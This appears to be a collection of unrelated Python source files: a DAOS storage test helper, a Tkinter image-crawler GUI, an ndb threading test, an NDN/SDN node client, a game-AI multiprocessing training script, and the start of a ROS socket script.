self.obj.close()
self.container.close()
@fail_on(DaosApiError)
def verify_single_object(self):
"""Verify the container data on the existing pool."""
self.pool.connect(2)
self.container.open()
self.obj.open()
self.log.info("Single Dataset Verification -- Started")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0]) *
self.record_length)
c_dkey = create_string_buffer("dkey {0}".format(dkey))
c_akey = create_string_buffer("akey {0}".format(akey))
val = self.ioreq.single_fetch(c_dkey,
c_akey,
len(indata)+1)
if indata != (repr(val.value)[1:-1]):
self.d_log.error("ERROR:Data mismatch for "
"dkey = {0}, "
"akey = {1}".format(
"dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
.format("dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.obj.close()
self.container.close()
def prepare_cont_ior_write_read(self, oclass, flags):
"""This method prepares the containers for
IOR write and read invocations.
To enable aggregation:
- Create two containers and read always from
first container
Normal usage (use only a single container):
- Create a single container and use the same.
Args:
oclass (str): IOR object class
flags (str): IOR flags
"""
self.log.info(self.pool_cont_dict)
# If pool is not in the dictionary,
# initialize its container list to None
# {poolA : [None, None], [None, None]}
if self.pool not in self.pool_cont_dict:
self.pool_cont_dict[self.pool] = [None] * 4
# Create container if the pool doesn't have one.
# Otherwise, use the existing container in the pool.
# pool_cont_dict {pool A: [containerA, Updated,
# containerB, Updated],
# pool B : containerA, Updated,
# containerB, None]}
if self.pool_cont_dict[self.pool][0] is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][0] = self.container
self.pool_cont_dict[self.pool][1] = "Updated"
else:
if ((self.test_during_aggregation is True) and
(self.pool_cont_dict[self.pool][1] == "Updated") and
(self.pool_cont_dict[self.pool][3] is None) and
("-w" in flags)):
# Write to the second container
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][2] = self.container
self.pool_cont_dict[self.pool][3] = "Updated"
else:
self.container = self.pool_cont_dict[self.pool][0]
def delete_extra_container(self, pool):
"""Delete the extra container in the pool.
Refer prepare_cont_ior_write_read. This method
should be called when OSA tests intend to
enable aggregation.
Args:
pool (object): pool handle
"""
self.pool.set_property("reclaim", "time")
extra_container = self.pool_cont_dict[pool][2]
extra_container.destroy()
self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
def update_cont_properties(self, cont_prop):
"""Update the existing container properties.
Args:
cont_prop (str): Replace existing container properties
with new value
"""
self.container.properties.value = cont_prop
def set_cont_class_properties(self, oclass="S1"):
"""Update the container class to match the IOR object
class. Fix the rf factor based on object replica value.
Also, remove the redundancy factor for S type
object class.
Args:
oclass (str, optional): Container object class to be set.
Defaults to "S1".
"""
self.container.oclass.value = oclass
# Set the container properties properly for S!, S2 class.
# rf should not be set to 1 for S type object class.
x = re.search("^S\\d$", oclass)
prop = self.container.properties.value
if x is not None:
prop = prop.replace("rf:1", "rf:0")
else:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
prop = prop.replace("rf:1", rf_value)
self.container.properties.value = prop
# Over-write oclass settings if using redundancy factor
# and self.test_with_rf is True.
# This has to be done so that container created doesn't
# use the object class.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.container.oclass.update(None)
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise CommandFailure(exc)
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
def run_ior_thread(self, action, oclass, test, single_cont_read=True,
fail_on_warning=True, pool=None):
"""Start the IOR thread for either writing or
reading data to/from a container.
Args:
action (str): Start the IOR thread with Read or
Write
oclass (str): IOR object class
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
pool (TestPool): Pool to run ior on. Defaults to None.
"""
# Intermediate (between correct and hack) implementation for allowing a
# pool to be passed in. Needs to be fixed by making the pool argument
# required.
if pool is None:
pool = self.pool
self.cleanup_queue()
if action == "Write":
flags = self.ior_w_flags
else:
flags = self.ior_r_flags
# Add a thread for these IOR arguments
process = threading.Thread(target=self.ior_thread,
kwargs={"pool": pool,
"oclass": oclass,
"test": test,
"flags": flags,
"single_cont_read":
single_cont_read,
"fail_on_warning":
fail_on_warning})
# Launch the IOR thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
def ior_thread(self, pool, oclass, test, flags,
single_cont_read=True,
fail_on_warning=True):
"""Start an IOR thread.
Args:
pool (object): pool handle
oclass (str): IOR object class, container class.
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
self.pool = pool
self.ior_cmd.get_params(self)
self.ior_cmd.set_daos_params(self.server_group, self.pool)
self.log.info("Redundancy Factor : %s", self.test_with_rf)
self.ior_cmd.dfs_oclass.update(oclass)
self.ior_cmd.dfs_dir_oclass.update(oclass)
if single_cont_read is True:
# Prepare the containers created and use in a specific
# way defined in prepare_cont_ior_write.
self.prepare_cont_ior_write_read(oclass, flags)
elif single_cont_read is False and self.container is not None:
# Here self.container is having actual value. Just use it.
self.log.info(self.container)
else:
self.fail("Not supported option on ior_thread")
try:
job_manager = self.get_ior_job_manager_command()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
job_manager.job.dfs_cont.update(self.container.uuid)
self.ior_cmd.transfer_size.update(test[2])
self.ior_cmd.block_size.update(test[3])
self.ior_cmd.flags.update(flags)
# Update oclass settings if using redundancy factor
# and self.test_with_rf is True.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.run_ior_with_pool(create_pool=False, create_cont=False,
fail_on_warning=fail_on_warning,
out_queue=self.out_queue)
if not self.out_queue.empty():
self.assert_on_exception()
def run_mdtest_thread(self, oclass="RP_2G1"):
"""Start mdtest thread and wait until thread completes.
Args:
oclass (str): IOR object class, container class.
"""
# Create container only
self.mdtest_cmd.dfs_destroy = False
if self.container is None:
self.add_container(self.pool, create=False)
self.mdtest_cmd.dfs_oclass.update(oclass)
self.set_cont_class_properties(self.mdtest_cmd.dfs_oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(self.mdtest_cmd.dfs_oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
job_manager = self.get_mdtest_job_manager_command(self.manager)
job_manager.job.dfs_cont.update(self.container.uuid)
# Add a thread for these IOR arguments
process = threading.Thread(target=self.execute_mdtest)
# Launch the MDtest thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
|
gui.py | # -*- coding: utf-8 -*-
from Tkinter import *
import tkMessageBox
import threading
from PIL import ImageTk, Image # pillow 로 하면 설치하면 py2app에서 에러가 난다
import serial
import time
import os
import key_set
import main
class Interface:
def __init__(self, Master):
self.country_sel=StringVar()
self.print_sel=StringVar()
self.master = Master
self.master.geometry('800x450')
self.keySet = key_set.Key()
self.print_sel=StringVar()
self.print1 = "RICOH_SP_150"
self.print2 = "RICOH_SP_150_2"
self.count = 0
# MainFrame
self.mainFrame = Frame(self.master, background="gray17")
self.mainFrame.pack(fill=X)
# titleFrame
self.titleFrame = Frame(self.mainFrame, background="gray17")
self.titleFrame.pack(side=TOP, fill=X)
self.titleLabel = Label(self.titleFrame, background="gray17")
self.titleLabel.configure(text='INTER[FACE]', foreground="white", font="SourceCodePro-Medium 50")
self.titleLabel.pack(padx=40, pady=40)
# selectFrame (Country)
self.selectCountryFrame = Frame(self.mainFrame, background="gray17")
self.selectCountryFrame.pack(side=TOP)
# self.selectCountryLabel = Label(self.selectCountryFrame, background="gray17")
# self.selectCountryLabel.configure(text='Country: ', foreground="white", font="SourceCodePro-Medium")
# self.selectCountryLabel.pack(side=LEFT)
self.selectCountryRadio1 = Radiobutton(self.selectCountryFrame, variable=self.country_sel, value="us", background="gray17")
self.selectCountryRadio1.pack(side=LEFT)
self.selectCountryRadio1Label = Label(self.selectCountryFrame, background="gray17")
self.selectCountryRadio1Label.configure(text="USA", foreground="white")
self.selectCountryRadio1Label.pack(side=LEFT, padx=10, pady=5)
self.selectCountryRadio2 = Radiobutton(self.selectCountryFrame, variable=self.country_sel, value="de", background="gray17")
self.selectCountryRadio2.pack(side=LEFT)
self.selectCountryRadio2Label = Label(self.selectCountryFrame, background="gray17")
self.selectCountryRadio2Label.configure(text="German", foreground="white")
self.selectCountryRadio2Label.pack(side=LEFT, padx=10, pady=5)
self.country_sel.set("us")
# selectFrame (print)
self.selectPrintFrame = Frame(self.mainFrame, background="gray17")
self.selectPrintFrame.pack(side=TOP)
# self.selectPrintLabel = Label(self.selectPrintFrame, background="gray17")
# self.selectPrintLabel.configure(text='Print: ', foreground="white", font="SourceCodePro-Medium")
# self.selectPrintLabel.pack(side=LEFT)
self.selectPrintRadio1 = Radiobutton(self.selectPrintFrame, variable=self.print_sel, value=self.print1, background="gray17")
self.selectPrintRadio1.pack(side=LEFT)
self.selctPrintRadio1Label = Label(self.selectPrintFrame, background="gray17")
self.selctPrintRadio1Label.configure(text="L ", foreground="white")
self.selctPrintRadio1Label.pack(side=LEFT, padx=10, pady=5)
self.selectPrintRadio2 = Radiobutton(self.selectPrintFrame, variable=self.print_sel, value=self.print2, background="gray17")
self.selectPrintRadio2.pack(side=LEFT)
self.selctPrintRadio2Label = Label(self.selectPrintFrame, background="gray17")
self.selctPrintRadio2Label.configure(text="R ", foreground="white")
self.selctPrintRadio2Label.pack(side=LEFT, padx=10, pady=5)
self.print_sel.set(self.print1)
# keyFrame
self.keyFrame = Frame(self.mainFrame, background="gray17")
self.keyFrame.pack(side=TOP, fill=X)
self.keyEntry = Entry(self.keyFrame, background="gray17")
self.keyEntry.configure(width=25, foreground="white", insertbackground="white", font="SourceCodePro-Medium 20")
self.keyEntry.pack(padx=20, pady=20)
# countFrame
self.countFrame = Frame(self.mainFrame, background="gray17")
self.countFrame.pack(side=TOP)
# self.img_cntLabel = Label(self.countFrame, background="gray17")
# self.img_cntLabel.configure(text='I.C', foreground="white", font="SourceCodePro-Medium")
# self.img_cntLabel.pack(side=LEFT, padx=3, pady=10)
self.img_cntEntry = Entry(self.countFrame, background="gray17")
self.img_cntEntry.configure(width=5, foreground="white")
self.img_cntEntry.pack(side=LEFT, padx=3, pady=10)
# self.corr_cntLabel = Label(self.countFrame, background="gray17")
# self.corr_cntLabel.configure(text='C.C', foreground="white", font="SourceCodePro-Medium")
# self.corr_cntLabel.pack(side=LEFT, padx=3, pady=10)
self.corr_cntEntry = Entry(self.countFrame, background="gray17")
self.corr_cntEntry.configure(width=5, foreground="white")
self.corr_cntEntry.pack(side=LEFT, padx=3, pady=10)
# self.depthLabel = Label(self.countFrame, background="gray17")
# self.depthLabel.configure(text='Dep', foreground="white", font="SourceCodePro-Medium")
# self.depthLabel.pack(side=LEFT, padx=3, pady=10)
self.depthEntry = Entry(self.countFrame, background="gray17")
self.depthEntry.configure(width=5, foreground="white")
self.depthEntry.pack(side=LEFT, padx=3, pady=10)
# self.sleepLabel = Label(self.countFrame, background="gray17")
# self.sleepLabel.configure(text='T.M', foreground="white", font="SourceCodePro-Medium")
# self.sleepLabel.pack(side=LEFT, padx=3, pady=10)
self.sleepEntry = Entry(self.countFrame, background="gray17")
self.sleepEntry.configure(width=5, foreground="white")
self.sleepEntry.pack(side=LEFT, padx=3, pady=10)
# ButtonFrame
self.buttonFrame = Frame(self.mainFrame, background="gray17")
self.buttonFrame.pack(side=TOP, fill=X)
self.findButton = Button(self.buttonFrame, command=self.findThreadingStart)
self.findButton.configure(text='▽', width=30, highlightbackground="gray17")
self.findButton.pack(padx=7, pady=5)
# self.startButton = Button(self.buttonFrame, command=self.startThreadingStart)
# self.startButton.configure(text='Start', width=20)
# self.startButton.pack(side=LEFT, padx=7, pady=5)
# self.stopButton = Button(self.buttonFrame, command=self.stopCrawling)
# self.stopButton.configure(text='Stop', width=30, highlightbackground="gray17")
# self.stopButton.pack(side=LEFT, padx=7, pady=5)
# Notification Frame
self.notificationFrame = Frame(self.mainFrame, background="gray17")
self.notificationFrame.pack(side=TOP, fill=X)
self.notification1Frame = Frame(self.notificationFrame, background="gray17")
self.notification1Frame.pack(side=LEFT, fill=X)
self.number1Label = Label(self.notification1Frame, background="gray17")
self.number1Label.pack(side=LEFT, padx=10, pady=5)
self.numberview1Label = Label(self.notification1Frame, background="gray17")
self.numberview1Label.pack(side=LEFT, padx=10, pady=5)
self.notification2Frame = Frame(self.notificationFrame, background="gray17")
self.notification2Frame.pack(side=RIGHT, fill=X)
self.number2Label = Label(self.notification2Frame, background="gray17")
self.number2Label.pack(side=LEFT, padx=10, pady=5)
self.numberview2Label = Label(self.notification2Frame, background="gray17")
self.numberview2Label.pack(side=LEFT, padx=10, pady=5)
# self.notificationButton = Button(self.notificationFrame, command=self.help)
# self.notificationButton.configure(text = 'Help')
# self.notificationButton.pack(side=RIGHT, padx=10, pady=5)
# Warning Frame
self.warningFrame = Frame(self.mainFrame, background="gray17")
self.warningFrame.pack(side=TOP, fill=X)
self.warning1Frame = Frame(self.warningFrame, background="gray17")
self.warning1Frame.pack(side=LEFT, fill=X)
self.warning1Label = Label(self.warning1Frame, background="gray17")
self.warning1Label.pack(side=LEFT, padx=10)
self.warning2Frame = Frame(self.warningFrame, background="gray17")
self.warning2Frame.pack(side=RIGHT, fill=X)
self.warning2Label = Label(self.warning2Frame, background="gray17")
self.warning2Label.pack(side=LEFT, padx=10)
# Bluetooth Connect
print("Start")
port="/dev/cu.TEST1-DevB" #This will be different for various devices and on windows it will probably be a COM port.
#self.bluetooth=serial.Serial(port, 9600)#Start communications with the bluetooth unit
print("Connected")
self.bluetooth = None
def findThreadingStart(self):
self.findThread = threading.Thread(target=self.findImage)
self.findThread.start()
def findImage(self):
self.keySet.key = self.keyEntry.get()
if self.keySet.key == "":
self.warningLabel.configure(text='[*] Please input keywords!', foreground="white")
return
self.keySet.img_count = self.img_cntEntry.get()
try:
self.keySet.img_count = int(self.keySet.img_count)
if self.keySet.img_count == 0:
if self.print_sel.get() == self.print1:
self.warning1Label.configure(text='[*] Please input lager then 0 in Image Count form', foreground="white")
else:
self.warning2Label.configure(text='[*] Please input lager then 0 in Image Count form', foreground="white")
return
except:
if self.print_sel.get() == self.print1:
self.warning1Label.configure(text='[*] Please input only INTEGER in Image Count form!', foreground="white")
else:
self.warning2Label.configure(text='[*] Please input only INTEGER in Image Count form!', foreground="white")
return
self.keySet.corr_cnt = self.corr_cntEntry.get()
try:
self.keySet.corr_cnt = int(self.keySet.corr_cnt)
except:
if self.print_sel.get() == self.print1:
self.warning1Label.configure(text='[*] Please input only INTEGER in Correlate Count form!', foreground="white")
else:
self.warning2Label.configure(text='[*] Please input only INTEGER in Correlate Count form!', foreground="white")
return
self.keySet.dep = self.depthEntry.get()
try:
self.keySet.dep = int(self.keySet.dep )
except:
if self.print_sel.get() == self.print1:
self.warning1Label.configure(text='[*] Please input only INTEGER in Depth Number form!', foreground="white")
else:
self.warning2Label.configure(text='[*] Please input only INTEGER in Depth Number form!', foreground="white")
return
sleep_time = self.sleepEntry.get()
try:
sleep_time = int(sleep_time)
except:
if self.print_sel.get() == self.print1:
self.warning1Label.configure(text='[*] Please input only INTEGER in Sleep Time form!', foreground="white")
else:
self.warning2Label.configure(text='[*] Please input only INTEGER in Sleep Time form!', foreground="white")
return
self.keySet.land_sel = self.country_sel.get()
self.keySet.print_sel = self.print_sel.get()
# 창 확장
if self.count == 0:
self.process_page()
self.count += 1
if self.print_sel.get() == self.print1:
# 메인 키 bluetooth로 전달
#self.bluetooth.write(b"K1" + str(key))
self.warning1Label.configure(text='[*] Finding Images...', foreground="white")
self.number1Label.configure(text='Images found : ', background="gray17", foreground="white")
self.numberview1Label.configure(text='N/A', background="gray17", foreground="white")
self.main = main.Main(self.keySet, self.bluetooth, self.process1Text, self.imageLabel, sleep_time)
self.number1 = self.main.findImg()
if self.number1 == -1:
self.warning1Label.configure(text='[*] No such Tag, please use other Tag', foreground="white")
return
elif self.number1 == -2:
self.warning1Label.configure(text='[*] Exception occured. Please feedback to developer.', foreground="white")
return
self.numberview1Label.configure(text=str(self.number1))
self.warning1Label.configure(text='[*] Finding Images finished', foreground="white")
else:
# 메인 키 bluetooth로 전달
#self.bluetooth.write(b"K2" + str(key))
self.warning2Label.configure(text='[*] Finding Images...', foreground="white")
self.number2Label.configure(text='Images found : ', background="gray17", foreground="white")
self.numberview2Label.configure(text='N/A', background="gray17", foreground="white")
self.main = main.Main(self.keySet, self.bluetooth, self.process2Text, self.imageLabel, sleep_time)
self.number2 = self.main.findImg()
if self.number2 == -1:
self.warning2Label.configure(text='[*] No such Tag, please use other Tag', foreground="white")
return
elif self.number2 == -2:
self.warning2Label.configure(text='[*] Exception occured. Please feedback to developer.', foreground="white")
return
self.numberview2Label.configure(text=str(self.number2))
self.warning2Label.configure(text='[*] Finding Images finished', foreground="white")
# def startThreadingStart(self):
# self.startThread = threading.Thread(target=self.startCrawling)
# self.startThread.start()
# def startCrawling(self):
# self.warningLabel.configure(text='[*] Crawling Started')
# try:
# num = self.countEntry.get()
# if num=="MAX":
# num = self.number
# else:
# try:
# num = int(num)
# except:
# self.warningLabel.configure(text='[*] Please input only INTEGER in number form!')
# return
# if num > self.number:
# num = self.number
# self.crawler.start(num)
# except:
# self.warningLabel.configure(text="[*] Please do 'Find' before 'Start'!")
# return
def process_page(self):
DIR = os.path.join(os.path.expanduser('~'), "Desktop/Pictures")
# self.master.geometry('1000x1000')
root.attributes('-fullscreen', True)
self.processFrame = Frame(self.mainFrame, background="gray17")
self.processFrame.pack(side=TOP)
self.process1Frame = Frame(self.processFrame, background="gray17")
self.process1Frame.pack(side=LEFT)
self.process1Text = Text(self.process1Frame, width=90, height=80, background="gray17", insertbackground="white")
self.process1Text.configure(foreground="white")
self.process1Text.pack(fill=X, padx=5, pady=5)
self.imageFrame = Frame(self.processFrame, background="gray17")
self.imageFrame.pack(side=LEFT)
photo = ImageTk.PhotoImage(Image.open(DIR + "/logo.png"))
self.imageLabel = Label(self.imageFrame, image=photo, width=400, height=500)
self.imageLabel.image = photo # keep a reference!
self.imageLabel.pack()
self.process2Frame = Frame(self.processFrame, background="gray17")
self.process2Frame.pack(side=RIGHT)
self.process2Text = Text(self.process2Frame, width=90, height=80, background="gray17", insertbackground="white")
self.process2Text.configure(foreground="white")
self.process2Text.pack(fill=X, padx=5, pady=5)
def stopCrawling(self):
self.warningLabel.configure(text="[*] It can't be used!!", foreground="white")
def help(self):
helpString = """ [Usage]
1. Input the keywords in the box. (ex: car)
2. Input the image count you want to crawl.
Input the correlate count you want to crawl.
Input the depth count you want to crawl.
!! Too many count (like above 100) can take many time.
!! So please be careful.
3. Click the Find button, and wait for finishing.
4. After finished, input the number you want to crawl.
If there's anything or number is greater than (3),
It's automatically set as the maximum(3's number).
If you want to crawl all of them, input 'MAX'.
5. Click the Start Button, and wait for finishing.
=============================================
This Program was made by Cdol.
It's made up of Python 2.7.10, with Tkinter, BeautifulSoup.
Please Feedback : ivrson9@gmail.com"""
tkMessageBox.showinfo("Images_Crawler::Help",helpString)
root = Tk()
root.title("Crawler")
root.geometry("600x800+400+200")
root.configure(background="gray17")
#최대화 root.attributes('-fullscreen', True)
myApp = Interface(root)
root.mainloop()
|
mttest.py | #
# Copyright 2008 The ndb Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A torture test to ferret out problems with multi-threading."""
import sys
import threading
from ndb import tasklets
from ndb import eventloop
def main():
##sys.stdout.write('_State.__bases__ = %r\n' % (eventloop._State.__bases__,))
num = 10
try:
num = int(sys.argv[1])
except Exception:
pass
threads = []
for i in range(num):
t = threading.Thread(target=one_thread, args=(i, num,))
t.start()
threads.append(t)
for t in threads:
t.join()
@tasklets.toplevel
def one_thread(i, num):
##sys.stdout.write('eventloop = 0x%x\n' % id(eventloop.get_event_loop()))
x = yield fibonacci(num)
sys.stdout.write('%d: %d --> %d\n' % (i, num, x))
@tasklets.tasklet
def fibonacci(n):
"""A recursive Fibonacci to exercise task switching."""
if n <= 1:
raise tasklets.Return(n)
a = yield fibonacci(n - 1)
b = yield fibonacci(n - 2)
raise tasklets.Return(a + b)
if __name__ == '__main__':
main()
|
node.py | #!/usr/bin/python3
#
# Copyright (C) 2019 Trinity College of Dublin, the University of Dublin.
# Copyright (c) 2019 Li Jian
# Author: Li Jian <lij12@tcd.ie>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
'''This module is the OF-SDN 'client', which needs to be run on every NDN node.
Before running this code, the OF-SDN controller side should be run first, so that
this node could report to the controller.
---This module used multiple threads to handle different tasks.
---This module included some other functions, refer to its optional arguments
'''
import sys
import time
import argparse
import traceback
import subprocess
from pyndn import Face
from oscommand import OSCommand
from helloreq import HelloReq
from status.status_monitor import Status_Monitor
from flowremoved import FlowRemovedMsg
from packetin import PacketIn
from featureres import FeatureRes
from ctrlinforeq import CtrlInfoReq
from threading import Thread
from errormsg import ErrorMsg
from of_route_processor import OF_Route_Processor
class Node(object):
def __init__(self):
self.outstanding = dict() #a dictionary to keep track of outstanding Interests and retransmissions.
self.isDone = False
#self.face = Face("127.0.0.1")
self.face = Face()
self.nodeid = OSCommand.getnodeid()
def run(self, packetin=False, fr=False, error=False):
#advertise a prefix for offering feature request
NodePrefixString = '/ndn/{}-site/{}/ofndn'.format(self.nodeid,self.nodeid)
subprocess.call(["export HOME=/tmp/minindn/{0} && nlsrc advertise {1} ".\
format(self.nodeid,NodePrefixString)],shell=True)
######## Basic function #######
hello_threed = Thread(target=self.Hellorequest) # send helloreq
hello_threed.start()
ctrlinfo_threed = Thread(target=self._sendCtrlInfoReqMsg) # send ctrlinfo
ctrlinfo_threed.start()
feature_threed = Thread(target=self.Feature_service) # send reature_data
feature_threed.start()
of_route_threed = Thread(target=self.OF_Route) # listen noNextHop log and send packetin
of_route_threed.start()
######## Advanced function #######
time.sleep(15)
'''This section is used to send packetin msg if necessary'''
unknown_prefix = "/abcd/dfgh/tcd"
if(packetin):
prefixinquire_threed = Thread(target=self.prefixinquire,args=(unknown_prefix,))
prefixinquire_threed.start()
'''This section is used to send flowremoved msg if necessary'''
removed_prefix = "/abcd/dfgh/tcd"
if (fr):
flowremoved_threed = Thread(target=self._sendFlowRemovedMsg, args=(removed_prefix,))
flowremoved_threed.start()
'''This section is used to send error msg if necessary'''
error_prefix = "{}--0x0004--0x0000--faceid255-down".format(self.nodeid)
if (error):
time.sleep(7)
errormsg_threed = Thread(target=self._errormsg, args=(error_prefix,))
errormsg_threed.start()
def Hellorequest(self):
Status_Monitor().run()
def Feature_service(self):
FeatureRes().run()
def OF_Route(self):
time.sleep(8)
OF_Route_Processor().loglistener()
def prefixinquire(self,unknown_prefix):
if(PacketIn().run(unknown_prefix)):
print("NDN FlowTable has been updated")
def _errormsg(self, error_prefix):
ErrorMsg().run(error_prefix)
def _sendFlowRemovedMsg(self,removed_prefix):
FlowRemovedMsg().run(removed_prefix)
def _sendCtrlInfoReqMsg(self):
time.sleep(5)
CtrlInfoReq().run() # here need other thread.
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Parse command line args for ndn consumer')
parser.add_argument("-p", "--packetin", nargs='?', const=True, help='True | False send PacketIn msg?')
parser.add_argument("-fr", "--flowremoved", nargs='?', const=True, help='True | False send FlowRemoved msg?')
parser.add_argument("-e", "--error", nargs='?', const=True, help='True | False send Error msg?')
args = parser.parse_args()
try:
packetin = args.packetin
fr = args.flowremoved
error = args.error
Node().run(packetin, fr, error)
except:
traceback.print_exc(file=sys.stdout)
print("Error parsing command line arguments")
sys.exit(1) |
Multiprocessing.py | import Train
from multiprocessing import Process, Manager
import numpy as np
import time
from FourInARow import Config
# from TicTacToe import Config
from collections import defaultdict
class DataStore:
def __init__(self, max_epochs_stored):
self.data = {}
self.max_epochs_stored = max_epochs_stored
self.counter = 0
def put_data(self, x, y_pol, y_val):
self.data[self.counter] = [x, y_pol, y_val]
self.counter = (self.counter + 1) % self.max_epochs_stored
def get_data(self):
x = []
y_pol = []
y_val = []
for data in self.data.values():
x.extend(data[0])
y_pol.extend(data[1])
y_val.extend(data[2])
return np.array(x), np.array(y_pol), np.array(y_val)
def multiprocess_function(config, num_processes, num_games_each_process, num_search, name_weights, seeds=None):
res_dict = Manager().dict()
x = list()
y_pol = list()
y_val = list()
workers = [Process(target=Train.generate_data,
args=(res_dict, config, num_games_each_process, num_search, i, name_weights, seeds[i]))
for i in range(num_processes)]
for worker in workers:
worker.daemon = True
worker.start()
for worker in workers: worker.join()
print("done")
for value in res_dict.values():
x.extend(value[0])
y_pol.extend(value[1])
y_val.extend(value[2])
return np.array(x), np.array(y_pol), np.array(y_val)
def train_process(x, y_pol, y_val, load_name, store_name, h, w, d):
# Importing libraries and setting the max gpu usage
from keras.optimizers import SGD
from loss import softmax_cross_entropy_with_logits, softmax
import ResNet
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
set_session(sess)
# Training the agent and storing the new weights
agent = ResNet.ResNet.build(h, w, d, 128, Config.policy_output_dim, num_res_blocks=10)
agent.compile(loss=[softmax_cross_entropy_with_logits, 'mean_squared_error'],
optimizer=SGD(lr=0.0005, momentum=0.9))
agent.load_weights(load_name)
agent.fit(x=x, y=[y_pol, y_val], batch_size=min(128, len(x)), epochs=2, callbacks=[])
agent.save_weights(store_name)
def combine_equals(x, y_pol, y_val):
dd = defaultdict(lambda: [0, None, np.zeros(y_pol[0].shape), 0])
for i in range(len(x)):
c = dd[str(x[i])]
c[0] += 1
c[1] = x[i]
c[2] += y_pol[i]
c[3] += y_val[i]
x = []
y_pol = []
y_val = []
for value in dd.values():
x.append(value[1])
y_pol.append(value[2] / value[0])
y_val.append(value[3] / value[0])
x = np.array(x)
y_pol = np.array(y_pol)
y_val = np.array(y_val)
return x, y_pol, y_val
def train(config, epochs, num_processes, num_games_each_process, num_search, game_name):
h, w, d = config.board_dims[1:]
data_store = DataStore(4)
# TODO: create process that does this
# import ResNet as nn
base_name = "Models/" + str(game_name) + "/"
# nn.ResNet().build(h, w, d, 128, config.policy_output_dim, num_res_blocks=10).save_weights(base_name + "10_3_0.h5")
for epoch in range(epochs):
now = time.time()
load_weights_name = base_name + "10_3_" + str(epoch) + ".h5"
seed_max = 1000000000
seeds = [[np.random.randint(0, seed_max) for _ in range(num_games_each_process)] for _ in
range(num_games_each_process)]
x, y_pol, y_val = multiprocess_function(config, num_processes, num_games_each_process, num_search,
load_weights_name,
seeds=seeds)
x, y_pol, y_val = combine_equals(x, y_pol, y_val)
data_store.max_epochs_stored = min(40, 4 + 3 * epochs // 4)
data_store.put_data(x, y_pol, y_val)
x, y_pol, y_val = data_store.get_data()
store_weights_name = base_name + "10_3_" + str(epoch + 1) + ".h5"
worker = Process(target=train_process, args=(x, y_pol, y_val, load_weights_name, store_weights_name, h, w, d))
worker.daemon = True
worker.start()
worker.join()
print("Finished epoch", epoch, "time:", time.time() - now)
return None
if __name__ == '__main__':
train(Config, 3000, 8, 500, 600, Config.name)
|
HiwinRA605_socket_ros_test_20190625194804.py | #!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
